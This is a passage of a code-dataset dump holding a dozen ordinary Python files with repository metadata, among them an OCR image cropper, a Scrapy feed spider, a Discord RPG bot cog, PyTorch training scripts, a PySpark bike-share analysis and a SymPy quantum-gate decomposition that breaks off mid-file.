VPN/Labsetup/volumes/server_TCP_tun.py","file_name":"server_TCP_tun.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14523333428","text":"import os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\nclass Cropper():\n def __init__(self, output_folder):\n self.output_folder = output_folder\n\n def crop_utils(self, pts):\n\n \"\"\"\n Takes inputs as 8 points\n and Returns cropped, masked image with a white background\n \"\"\"\n rect = cv2.boundingRect(pts)\n x,y,w,h = rect\n cropped = self.img.copy().crop((x,y,x+w,y+h))\n return cropped\n\n\n def crop(self, image, df):\n self.score_bbox = df['Scores']\n self.bbox_coords = df['BBox']\n self.img = image.copy()\n num_bboxes = len(self.score_bbox)\n for num in range(num_bboxes):\n bbox_coords = self.bbox_coords[num]\n if bbox_coords.size != 0:\n l_t = float(bbox_coords[0][0])\n t_l = float(bbox_coords[0][1])\n r_t = float(bbox_coords[1][0])\n t_r = float(bbox_coords[1][1])\n r_b = float(bbox_coords[2][0])\n b_r = float(bbox_coords[2][1])\n l_b = float(bbox_coords[3][0])\n b_l = float(bbox_coords[3][1])\n pts = np.array([[int(l_t), int(t_l)], [int(r_t) ,int(t_r)], [int(r_b) , int(b_r)], [int(l_b), int(b_l)]])\n \n if np.all(pts) > 0:\n \n box = self.crop_utils(pts)\n try:\n file_name = os.path.join(self.output_folder,f'{num}.jpg')\n print(os.getcwd())\n print(file_name)\n box.save(file_name)\n except:\n continue\n else:\n print('None')","repo_name":"nhamnx/receipt_ocr","sub_path":"modules/text_detection/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28412292916","text":"class Solution:\n \"\"\"\n @param: A: An integer array\n @return: A list of integers includes the index of the first number and the index of the last number\n \"\"\"\n def continuousSubarraySum(self, A):\n # O(n)\n # max_sum, compare with prefix_sum[i] - min(prefix_sum[:i])\n # prefix_sum[i] = sum(A[0] ... A[i-1])\n min_ind, max_sum = 0, - float('inf')\n prefix_sum = [0]\n result = [-1, -1]\n for i, num in enumerate(A):\n cur_sum = prefix_sum[i] + num\n prefix_sum.append(cur_sum)\n if max_sum < cur_sum - prefix_sum[min_ind]:\n max_sum = cur_sum - prefix_sum[min_ind]\n result = [min_ind, i]\n min_ind = i + 1 if cur_sum < prefix_sum[min_ind] else min_ind \n \n return result\n \n \n ######### enumeration ########\n# 枚举即可, 枚举的过程中维护以当前元素结尾的最大和.\n# 每次循环把当前元素加到这个和中, 在加上之前判断:\n# 如果这个和是负数, 则放弃之前的元素, 把和置为0, 区间左端点设为当前元素\n# 如果是正数, 则直接累加.\nclass Solution:\n # @param {int[]} A an integer array\n # @return {int[]} A list of integers includes the index of the \n # first number and the index of the last number\n def continuousSubarraySum(self, A):\n ans = -0x7fffffff\n sum = 0\n start, end = 0, -1\n result = [-1, -1]\n for x in A:\n if sum < 0:\n sum = x\n start = end + 1\n end = start\n else:\n sum += x\n end += 1\n if sum > ans:\n ans = sum\n result = [start, end]\n\n return result\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/data_structure/continuous-subarray-sum.py","file_name":"continuous-subarray-sum.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16900572600","text":"import scrapy\n\nfrom feeds.loaders import FeedEntryItemLoader\nfrom feeds.spiders import FeedsSpider\n\n\nclass AkCiandoComSpider(FeedsSpider):\n name = \"ak.ciando.com\"\n start_urls = [\n \"https://ak.ciando.com/shop/index.cfm?fuseaction=cat_overview&cat_ID=0\"\n \"&cat_nav=0&more_new=1&rows=100&intStartRow=1\"\n ]\n\n feed_title = \"AK Digitale Bibliothek\"\n feed_subtitle = \"Neue Titel in der digitalen AK Bibliothek\"\n feed_link = f\"https://{name}\"\n\n def parse(self, response):\n for link in response.xpath('//p[@class=\"p_blr_title\"]//a/@href').extract():\n yield scrapy.Request(response.urljoin(link), self.parse_item)\n\n def parse_item(self, response):\n il = FeedEntryItemLoader(\n selector=response.xpath('//div[@id=\"maincontentbook\"]'),\n base_url=self.feed_link,\n )\n il.add_xpath(\"title\", '//h1[@class=\"p_book_title\"]/text()')\n il.add_xpath(\"title\", '//h3[@class=\"p_book_title_ebook\"]/text()')\n il.add_value(\"link\", response.url)\n il.add_value(\"author_name\", self.feed_title)\n il.add_xpath(\"content_html\", '//h1[@class=\"p_book_title\"]/text()')\n il.add_xpath(\"content_html\", '//h2[@class=\"p_book_author\"]/text()')\n il.add_xpath(\"content_html\", '//p[@class=\"p_book_publisher\"]/text()')\n il.add_xpath(\"content_html\", '//p[@class=\"p_book_isbn\"]/text()')\n il.add_xpath(\"content_html\", '(//span[@class=\"txt10px\"])[1]/text()')\n il.add_xpath(\"content_html\", '(//span[@class=\"txt10px\"])[3]/text()')\n il.add_xpath(\"content_html\", '//div[@class=\"bookcontent\"]//text()')\n il.add_xpath(\"content_html\", '//div[@class=\"p_book_image\"]/img')\n il.add_xpath(\"content_html\", '//span[@style=\"color:red;\"]/b/text()')\n return il.load_item()\n","repo_name":"SolaraWW/PyFeeds","sub_path":"feeds/spiders/ak_ciando_com.py","file_name":"ak_ciando_com.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"7179961458","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\npyTOP.exceptions\n~~~~~~~~~~~~~~~~~~~\n\nThis module contains the set of pyTOP's exceptions.\n\n\"\"\"\n\nERROR_MESSAGES = {\n\n #系统级错误\n 3:u'图片上传失败',\n 4:u'用户调用次数超限',\n 5:u'会话调用次数超限',\n 6:u'合作伙伴调用次数超限',\n 7:u'应用调用次数超限',\n 8:u'应用调用频率超限',\n 9:u'HTTP方法被禁止(请用大写的POST或GET)',\n 10:u'服务不可用',\n 11:u'开发者权限不足',\n 12:u'用户权限不足',\n 13:u'合作伙伴权限不足',\n 15:u'远程服务出错',\n 21:u'缺少方法名参数',\n 22:u'不存在的方法名',\n 23:u'非法数据格式',\n 24:u'缺少签名参数',\n 25:u'非法签名',\n 26:u'缺少SessionKey参数',\n 27:u'无效的SessionKey参数',\n 28:u'缺少AppKey参数',\n 29:u'非法的AppKe参数',\n 30:u'缺少时间戳参数',\n 31:u'非法的时间戳参数',\n 32:u'缺少版本参数',\n 33:u'非法的版本参数',\n 34:u'不支持的版本号',\n 40:u'缺少必选参数',\n 41:u'非法的参数',\n 42:u'请求被禁止',\n 43:u'参数错误',\n\n #容器类错误\n 100:u'授权码已经过期',\n 101:u'授权码在缓存里不存在,一般是用同样的authcode两次获取sessionkey',\n 103:u'appkey或者tid(插件ID)参数必须至少传入一个',\n 104:u'appkey或者tid对应的插件不存在',\n 105:u'插件的状态不对,不是上线状态或者正式环境下测试状态',\n 106:u'没权限调用此app,由于插件不是所有用户都默认安装,所以需要用户和插件进行一个订购关系。',\n 108:u'由于app有绑定昵称,而登陆的昵称不是绑定昵称,所以没权限访问。',\n 109:u'服务端在生成参数的时候出了问题(一般是tair有问题)',\n 110:u'服务端在写出参数的时候出了问题',\n 111:u'服务端在生成参数的时候出了问题(一般是tair有问题)',\n\n #业务级错误\n 501:u'语句不可索引',\n 502:u'数据服务不可用',\n 503:u'无法解释TBQL语句',\n 504:u'需要绑定用户昵称',\n 505:u'缺少参数',\n 506:u'参数错误',\n 507:u'参数格式错误',\n 508:u'获取信息权限不足',\n 540:u'交易统计服务不可用',\n 541:u'类目统计服务不可用',\n 542:u'商品统计服务不可用',\n 550:u'用户服务不可用',\n 551:u'商品服务不可用',\n 552:u'商品图片服务不可用',\n 553:u'商品更新服务不可用',\n 554:u'商品删除失败',\n 555:u'用户没有订购图片服务',\n 556:u'图片URL错误',\n 557:u'商品视频服务不可用',\n 560:u'交易服务不可用',\n 561:u'交易服务不可用',\n 562:u'交易不存在',\n 563:u'非法交易',\n 564:u'没有权限添加或更新交易备注',\n 565:u'交易备注超出长度限制',\n 566:u'交易备注已经存在',\n 567:u'没有权限添加或更新交易信息',\n 568:u'交易没有子订单',\n 569:u'交易关闭错误',\n 570:u'物流服务不可用',\n 571:u'非法的邮费',\n 572:u'非法的物流公司编号',\n 580:u'评价服务不可用',\n 581:u'添加评价服务错误',\n 582:u'获取评价服务错误',\n 590:u'店铺服务不可用',\n 591:u'店铺剩余推荐数 服务不可用',\n 592:u'卖家自定义类目服务不可用',\n 594:u'卖家自定义类目添加错误',\n 595:u'卖家自定义类目更新错误',\n 596:u'用户没有店铺',\n 597:u'卖家自定义父类目错误',\n 601:u'用户不存在',\n 611:u'产品数据格式错误',\n 612:u'产品ID错误',\n 613:u'删除产品图片错误',\n 614:u'没有权限添加产品',\n 615:u'收货地址服务不可用',\n 620:u'邮费服务不可用',\n 621:u'邮费模���类型错误',\n 622:u'缺少参数:post, express或ems',\n 623:u'邮费模板参数错误',\n 630:u'收费服务不可用',\n 650:u'退款服务不可用',\n 651:u'非法的退款编号',\n 670:u'佣金服务不可用',\n 671:u'佣金交易不存在',\n 672:u'淘宝客报表服务不可用',\n 673:u'备案服务不可用',\n 674:u'应用服务不可用',\n 710:u'淘宝客服务不可用',\n 900:u'远程连接错误',\n 901:u'远程服务超时',\n 902:u'远程服务错误',\n \n #CUSTOM ERRORS\n 1000:u'Bad Environment',\n}\n\nclass TOPException(Exception):\n \"\"\"There was an ambiguous exception that occurred while handling your\n TOP request.\"\"\"\n def __init__(self, code, msg=None):\n if not msg:\n msg = ERROR_MESSAGES.get(code,u'未知错误(%d)'%code)\n if type(msg) == unicode:\n msg = msg.encode('utf-8')\n super(TOPException, self).__init__(msg)\n self.code = code\n \n def __str__(self):\n return \"%s (code=%d)\" % (super(TOPException, self).__str__(), self.code)\n \n __repr__ = __str__\n","repo_name":"bububa/pyTOP","sub_path":"pyTOP/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"zh","doc_type":"code","stars":44,"dataset":"github-code","pt":"67"} +{"seq_id":"11463589947","text":"import discord, os\r\nfrom discord.ext import commands\r\nfrom libraries.enemy_handling import Enemy\r\nfrom libraries.fight_handling import Fight\r\nfrom libraries.player_handling import Player\r\n\r\ndefault_fight_directory = 'data/enemies/'\r\nSPECIAL = [(0,0),(0,6),(6,6)]\r\n\r\n#used to check if the command is executed in the channel #bot-commands or direct messages\r\nasync def in_bot_commands_or_dm(ctx):\r\n return ctx.channel.id == 519104699211972640 or isinstance(ctx.channel, discord.DMChannel)\r\n\r\nclass fight_system:\r\n '''Commands for fights'''\r\n def __init__(self, bot):\r\n self.bot = bot\r\n print('Fight System Loaded!')\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n @commands.is_owner()\r\n async def startfight(self, ctx):\r\n '''Used to start a fight with a random enemy. TESTING & OWNER ONLY.'''\r\n self.fight = Fight(ctx.author.id)\r\n await ctx.author.send(self.fight.initiate_fight()) #Using this we call the initiate_fight function and whatever is returned we send to the user\r\n del self.fight\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def attack(self, ctx):\r\n '''Used to choose an option in a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n self.message = self.fight.attack()\r\n await ctx.author.send(self.message) #Using this we call the attack function and whatever is returned we send to the user\r\n del self.fight\r\n if 'Successfully moved!' in self.message: #if the string is in the message means the player was moving before so we send their new location\r\n self.player = Player(ctx.author.id)\r\n self.player.save_map()\r\n file = discord.File('data/players/maps/' + str(ctx.author.id) + '.png')\r\n await ctx.author.send(file=file)\r\n await self.update_ranks(ctx, self.player.get_coords())\r\n del self.player\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def run(self, ctx):\r\n '''Used to choose an option in a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n await ctx.author.send(self.fight.run()) #Using this we call the run function and whatever is returned we send to the user\r\n del self.fight\r\n\r\n @commands.command()\r\n @commands.check(in_bot_commands_or_dm)\r\n async def item(self, ctx, *item_name):\r\n '''Used to use an item during a fight.'''\r\n self.fight = Fight(ctx.author.id)\r\n self.item_name = ' '.join(item_name)\r\n self.message = self.fight.use_item(self.item_name)\r\n await ctx.author.send(self.message) #Using this we call the use_item function and whatever is returned we send to the user\r\n del self.fight\r\n if 'Successfully moved!' in self.message: #if the string is in the message means the player was moving before so we send their new location\r\n self.player = Player(ctx.author.id)\r\n self.player.save_map()\r\n file = discord.File('data/players/maps/' + str(ctx.author.id) + '.png')\r\n await ctx.author.send(file=file)\r\n await self.update_ranks(ctx, self.player.get_coords())\r\n del self.player\r\n\r\n async def update_ranks(self, ctx, coords):\r\n '''Used to update the ranks in the server according to the users position'''\r\n #We get the roles from the server\r\n self.city_one = discord.utils.get(self.bot.guilds[0].roles, name='City One')\r\n self.city_two = discord.utils.get(self.bot.guilds[0].roles, name='City Two')\r\n self.city_three = discord.utils.get(self.bot.guilds[0].roles, name='City Three')\r\n self.wilderness = discord.utils.get(self.bot.guilds[0].roles, name='Wilderness')\r\n if coords in SPECIAL: #If user went to a city we remove the wilderness role and give them a city role\r\n for user in self.bot.guilds[0].members:\r\n if ctx.author == user:\r\n await user.remove_roles(self.wilderness)\r\n if coords == (0, 0):\r\n await user.add_roles(self.city_one)\r\n elif coords == (0, 6):\r\n await user.add_roles(self.city_two)\r\n elif coords == (6, 6):\r\n await user.add_roles(self.city_three)\r\n else: #If user went to wilderness we remove all city roles and give wilderness role\r\n for user in self.bot.guilds[0].members:\r\n if ctx.author == user:\r\n await user.remove_roles(self.city_one, self.city_two, self.city_three)\r\n await user.add_roles(self.wilderness)\r\n\r\ndef setup(bot):\r\n bot.add_cog(fight_system(bot))","repo_name":"emiipo/discord-and-dragons","sub_path":"cogs/fight_system.py","file_name":"fight_system.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21849467583","text":"class NumError(Exception):\n def __init__(self, exp, mes):\n self.exp = exp\n self.mes = mes\n\n\nclass Dr:\n def __init__(self, top, bottom):\n if top > bottom:\n raise NumError(top, 'Should')\n self.top = top\n self.bottom = bottom\n\n def __add__(self, other):\n new_top = self.top * other.bottom + other.top * self.bottom\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __sub__(self, other):\n new_top = self.top * other.bottom - other.top * self.bottom\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __mul__(self, other):\n if isinstance(other, int):\n new_top = self.top * other\n return Dr(new_top, self.bottom)\n else:\n new_top = self.top * other.top\n new_bot = self.bottom * other.bottom\n return Dr(new_top, new_bot)\n\n def __eq__(self, other):\n new_num = self.top / self.bottom\n new_num2 = other.top / other.bottom\n return new_num == new_num2\n\n def __str__(self):\n return f'{self.top} / {self.bottom}'\n\n\ndr1 = Dr(1, 4)\ndr2 = Dr(5, 6)\n\nprint(Dr.__add__(dr1, dr2))\nprint(Dr.__sub__(dr1, dr2))\nprint(Dr.__mul__(dr1, dr2))\nprint(Dr.__eq__(dr1, dr2))\n","repo_name":"komararyna/HomeworkPro5","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36334108831","text":"import torch\nfrom torch import nn\n\n\ndef stochastic_gradient_descent(parameters, f_learn_rate, f_batch_size):\n \"\"\"小批量随机梯度下降\"\"\"\n with torch.no_grad():\n # 更新的时候不需要梯度参与运算\n for parameter in parameters:\n # print('parameter = ', parameter)\n # print('parameter.grad = ', parameter.grad)\n parameter -= f_learn_rate * parameter.grad /f_batch_size\n parameter.grad.zero_()\n\n\nx = torch.tensor([[0.0, 1], [2, 3]])\nw1 = torch.tensor([[0.4], [0.5]])\nw1.requires_grad_(True)\nw2 = torch.tensor([[0.4], [0.5]])\nw2.requires_grad_(True)\nw3 = torch.tensor([[0.4], [0.5]])\nw3.requires_grad_(True)\nw4 = torch.tensor([[0.4], [0.5]])\nw4.requires_grad_(True)\n\ny_hat1 = torch.matmul(x, w1)\ny_hat2 = torch.matmul(x, w2)\ny_hat3 = torch.matmul(x, w3)\ny_hat4 = torch.matmul(x, w4)\ny = torch.tensor([[1.0], [1]])\nprint(\"y = \", y)\nprint(\"y_hat = \", y_hat1)\n\nl1 = nn.MSELoss(reduction='none')(y_hat1, y)\nprint(\"l1 = \", l1)\nl1.sum().backward()\nprint(\"w1.grad = \", w1.grad)\ntorch.optim.SGD([w1], 0.1).step()\nprint(\"w1 = \", w1)\n\nl2 = nn.MSELoss(reduction='sum')(y_hat2, y)\nprint(\"l2 = \", l2)\nl2.backward()\nprint(\"w2.grad = \", w2.grad)\ntorch.optim.SGD([w2], 0.1).step()\nprint(\"w2 = \", w2)\n\nl3 = nn.MSELoss(reduction='none')(y_hat3, y)\nprint(\"l3 = \", l3)\nl3.sum().backward()\nprint(\"w3.grad = \", w3.grad)\nstochastic_gradient_descent([w3], 0.1, 2)\nprint(\"w3 = \", w3)\n\nl4 = nn.MSELoss(reduction='sum')(y_hat4, y)\nprint(\"l4 = \", l4)\nl4.backward()\nprint(\"w4.grad = \", w4.grad)\nstochastic_gradient_descent([w4], 0.1, 2)\nprint(\"w4 = \", w4)\n\n# y = tensor([[1.],\n# [1.]])\n# y_hat = tensor([[0.5000],\n# [2.3000]], grad_fn=)\n# l1 = tensor([[0.2500],\n# [1.6900]], grad_fn=)\n# w1.grad = tensor([[5.2000],\n# [6.8000]])\n# w1 = tensor([[-0.1200],\n# [-0.1800]], requires_grad=True)\n# l2 = tensor(1.9400, grad_fn=)\n# w2.grad = tensor([[5.2000],\n# [6.8000]])\n# w2 = tensor([[-0.1200],\n# [-0.1800]], requires_grad=True)\n# l3 = tensor([[0.2500],\n# [1.6900]], grad_fn=)\n# w3.grad = tensor([[5.2000],\n# [6.8000]])\n# w3 = tensor([[0.1400],\n# [0.1600]], requires_grad=True)\n# l4 = tensor(1.9400, grad_fn=)\n# w4.grad = tensor([[5.2000],\n# [6.8000]])\n# w4 = tensor([[0.1400],\n# [0.1600]], requires_grad=True)\n","repo_name":"MildCloud/LearningDeepLearningByHand","sub_path":"MarkovModel/grad_fn.py","file_name":"grad_fn.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8754361902","text":"from src.utils.to_string import to_string\nfrom src.datasets import EmbeddingsTrackLevel\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence\nfrom torch import nn\nfrom src.models.commons import SequenceCategoricalClassification\nfrom src.early_stopping import EarlyStopping\nfrom src.metrics import compute_metrics\nfrom tqdm import tqdm\n\n\ndef test_loop(dataloader, model, loss_fn):\n test_loss = 0\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n predictions = []\n ys = []\n\n with torch.no_grad():\n for batch in dataloader:\n\n X = [sample[0].to(device) for sample in batch]\n Y = [sample[1].to(device) for sample in batch]\n\n lengths = [len(x) for x in X]\n X = pad_sequence(X)\n X = pack_padded_sequence(\n X, lengths, batch_first=False, enforce_sorted=False\n )\n\n Y = torch.stack(Y)\n pred = model(X)\n\n predictions.append(pred)\n ys.append(Y)\n\n test_loss += loss_fn(pred, Y).item()\n\n predictions, ys = torch.cat(predictions), torch.cat(ys)\n\n test_loss /= len(dataloader.dataset)\n\n return predictions, ys\n\n\ndef train_loop(dataloader, model, loss_fn, optimizer):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n for n_batch, batch in enumerate(tqdm(dataloader)):\n\n X = [sample[0].to(device) for sample in batch]\n Y = [sample[1].to(device) for sample in batch]\n\n lengths = [len(x) for x in X]\n X = pad_sequence(X)\n X = pack_padded_sequence(X, lengths, batch_first=False, enforce_sorted=False)\n\n Y = torch.stack(Y)\n\n pred = model(X)\n loss = loss_fn(pred, Y)\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if n_batch % 100 == 0:\n loss, _ = loss.item(), n_batch * len(X)\n\n\ndef run(params, training_data, test_data, return_metrics=True):\n assert set(list(params.keys())) == set(\n [\"batch_size\", \"learning_rate\", \"weight_decay\", \"num_workers\"]\n )\n\n train_dataloader = DataLoader(\n training_data,\n batch_size=params[\"batch_size\"],\n num_workers=params[\"num_workers\"],\n collate_fn=lambda x: x,\n pin_memory=True,\n )\n test_dataloader = DataLoader(\n test_data,\n batch_size=params[\"batch_size\"],\n num_workers=params[\"num_workers\"],\n collate_fn=lambda x: x,\n pin_memory=True,\n )\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"Using device: {device}\")\n model = SequenceCategoricalClassification().to(device)\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(\n model.parameters(),\n lr=params[\"learning_rate\"],\n weight_decay=params[\"weight_decay\"],\n )\n early_stopping = EarlyStopping(patience=10)\n\n array = [None]\n while True:\n train_loop(train_dataloader, model, loss_fn, optimizer)\n predictions, ys = test_loop(test_dataloader, model, loss_fn)\n metrics = compute_metrics(predictions, ys)\n array.append((predictions, ys))\n\n print(to_string(metrics))\n if early_stopping.stop(metrics):\n break\n\n best_epoch, metrics = early_stopping.best()\n if return_metrics:\n return metrics\n else:\n return array[best_epoch]\n\n\nif __name__ == \"__main__\":\n params = {\n \"learning_rate\": 0.37,\n \"weight_decay\": 10 ** -6,\n \"batch_size\": 32,\n \"num_workers\": 0,\n }\n training_data = EmbeddingsTrackLevel(split=\"train\", method=\"matrix_factorization\")\n\n validation_data = EmbeddingsTrackLevel(\n split=\"validation\", method=\"matrix_factorization\"\n )\n run(params, training_data, validation_data)\n","repo_name":"GiovanniGabbolini/playlist-context-prediction","sub_path":"src/models/sequence_two_steps.py","file_name":"sequence_two_steps.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5794735134","text":"from openpyxl import Workbook,load_workbook\n\n\n#写入\nexcel_adress = r\"F:\\Python操作Excel测试.xlsx\"\n\nwb = load_workbook(excel_adress)\nsht = wb[wb.sheetnames[0]]\n\n\nprint() ##sheetnames是获取工作表中的所有表的表名,即可查看该xlsx文件里面所有表\n\nprint(sht)\n\n\n# 没有定位直接写入\nlist_1 = [5, 6, 7, 8]\nsht.append(list_1)\n\n# 增加一个定位\nsht[\"A3\"] = \"开始\"\nlist_2 = [1, 2, 3, 4]\nsht.append(list_2)\n\n# 增加一个定位\nsht[\"D5\"] = \"新开始\"\nlist_3 = [11, 12, 13, 14]\nsht.append(list_3)\n\n# 增加一个定位\nsht[\"L15\"] = \"新开始2\"\nlist_4 = [21, 22, 23, 24]\nlist_5 = [21, \"赌气回答我的\", 23, 24]\nsht.append(list_4)\nsht.append(list_5)\n\nwb.save(excel_adress)\n\n\n\n\n\n\n","repo_name":"zhcWindCloud/Python_Tests","sub_path":"Python_Operations/python之操作Excel.py","file_name":"python之操作Excel.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12112407327","text":"import pytest\n\nfrom src.repository import memrepo\nfrom src.shared.domain_model_abc import DomainModel\n\n\n@pytest.fixture\ndef user_dicts():\n return [\n {\n \"user_id\": \"305a6c67-8bea-4994-81ed-b6511c4b181f\",\n \"login\": \"user1\",\n },\n {\n \"user_id\": \"f30dcc11-6f48-4bfb-a17e-f90b9d566c03\",\n \"login\": \"user2\",\n },\n {\n \"user_id\": \"de9538b3-98f7-4469-b111-2ac64170c84f\",\n \"login\": \"user3\",\n },\n ]\n\n\ndef _check_results(domain_models_list, data_list):\n assert len(domain_models_list) == len(data_list)\n assert all([isinstance(dm, DomainModel) for dm in domain_models_list])\n assert set([dm.login for dm in domain_models_list]) == set(\n [d[\"login\"] for d in data_list]\n )\n\n\nclass TestMemrepoList:\n def test_without_parameters(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n _check_results(repo.list(), user_dicts)\n\n def test_with_filters_unknown_key(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n with pytest.raises(KeyError):\n repo.list(filters={\"/\": \"unexpected param\"})\n\n def test_with_filters_unknown_operator(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n with pytest.raises(ValueError):\n repo.list(filters={\"login__in\": [20, 30]})\n\n def test_with_filters_login(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(repo.list(filters={\"login\": \"user3\"}), [user_dicts[2]])\n\n def test_with_filters_login_eq(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(repo.list(filters={\"login\": \"user3\"}), [user_dicts[2]])\n\n def test_with_filters_user_id(self, user_dicts):\n repo = memrepo.MemRepo(user_dicts)\n\n _check_results(\n repo.list(filters={\"user_id\": \"de9538b3-98f7-4469-b111-2ac64170c84f\"}),\n [user_dicts[2]],\n )\n","repo_name":"tuod/bikerides","sub_path":"backend/tests/repository/test_memrepo.py","file_name":"test_memrepo.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33703135354","text":"from datetime import datetime\nfrom pyspark.sql.functions import col, udf\nfrom pyspark.sql.types import DateType\n\ndef getZip(st):\n\tif st == 'Mountain View':\n\t\treturn 94041\n\telif st == 'Palo Alto':\n\t\treturn 94301\n\telif st == 'Redwood City':\n\t\treturn 94063\n\telif st == 'San Jose':\n\t\treturn 95113\n\telif st == 'San Francisco':\n\t\treturn 94107\n\n\nStationData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_station_data.csv').map(lambda x: x.split(','))\n\nS_Header = StationData.first()\n\ns_data = StationData.filter(lambda row: row !=S_Header).map(lambda x: (x[0], getZip(x[5])))\n\n\nStatusData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_status_data.csv').map(lambda x: x.split(','))\n\nSt_Header = StatusData.first()\n\nst_data = StatusData.filter(lambda row: row !=St_Header).map(lambda x: ((x[0][1:-1],x[3][1:-1].split(' ')[0]), int(x[2][1:-1])))\n\n\nAveragedStatusData = st_data.groupByKey().mapValues(lambda x: sum(x)/len(x));\n\nCombinedData = AveragedStatusData.map(lambda x:(x[0][0],(x[0][1],x[1]))).join(s_data)\n\nResult = CombinedData.map(lambda x: ( (datetime.strptime(x[1][0][0],'%Y/%m/%d').isoformat().split(\"T\")[0],x[1][1]),x[1][0][1])).reduceByKey(lambda a, b: a + b)\n\nWeatherData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_weather_data.csv').map(lambda x: x.split(','))\n\nw_Header = WeatherData.first()\n\nw_data = WeatherData.filter(lambda row: row !=w_Header)\n\nIndexedWeatherData = w_data.map(lambda x: ((datetime.strptime(x[0], '%m/%d/%Y').isoformat().split(\"T\")[0],int(x[23])),(x[2],x[5],x[8],x[11],x[14],x[17],x[19],x[21])))\n\nNewResult = Result.join(IndexedWeatherData)\n\n\nFinal = NewResult.map(lambda x: (x[0][0],x[0][1],x[1][1][0] ,x[1][1][1],x[1][1][2],x[1][1][3],x[1][1][4],x[1][1][5],x[1][1][6],x[1][1][7] ,x[1][0]))\n\n\ndf = sqlContext.createDataFrame(Final, ['date','zipcode','temp', 'dewpoint','humidity','sealevel','visibility','windspeed','precipitation','event','count'])\ndf.coalesce(1).write.format(\"com.databricks.spark.csv\").option(\"header\", \"true\").save(\"/Users/charuarora/Documents/UTD/Spring_2017/BigData/project/weather/weather2014.csv\")\n\n","repo_name":"charuarora09/Data-Science","sub_path":"Bikeshare-Data-Analysis/query3.py","file_name":"query3.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29444424274","text":"from sympy import Matrix, log, sqrt, det # , cos, sin, exp\r\nfrom sympy.physics.quantum import TensorProduct, Dagger\r\nimport itertools\r\n\r\n\r\n# Calculating the decomposition of U = K1 * A * K2\r\n\r\n# A = Matrix([\r\n# [cos(alpha - beta) * exp(1j * gamma), 0, 0, 1j * sin(alpha - beta) * exp(1j * gamma)],\r\n# [0, cos(alpha + beta) * exp(-1j * gamma), 1j * sin(alpha + beta) * exp(-1j * gamma), 0],\r\n# [0, 1j * sin(alpha + beta) * exp(-1j * gamma), cos(alpha + beta) * exp(-1j * gamma), 0],\r\n# [1j * sin(alpha - beta) * exp(1j * gamma), 0, 0, cos(alpha - beta) * exp(1j * gamma)]]\r\n# )\r\n\r\n# Matrix Q transforms the standard basis into the magic basis.\r\nQ = Matrix([\r\n [1, 0, 0, 1j],\r\n [0, 1j, 1, 0],\r\n [0, 1j, -1, 0],\r\n [1, 0, 0, -1j]]\r\n ) / sqrt(2)\r\n\r\nQ_dag = Dagger(Q)\r\n\r\n# Pauli single-qubit operator matrices\r\nId = Matrix([ # Keyword I is reserved for imaginary numbers.\r\n [1, 0],\r\n [0, 1]]\r\n )\r\nX = Matrix([\r\n [0, 1],\r\n [1, 0]]\r\n )\r\nY = Matrix([\r\n [0, -1j,],\r\n [1j, 0]]\r\n )\r\nZ = Matrix([\r\n [1, 0],\r\n [0, -1]]\r\n )\r\n\r\nXX = TensorProduct(X, X)\r\nYY = TensorProduct(Y, Y)\r\nZZ = TensorProduct(Z, 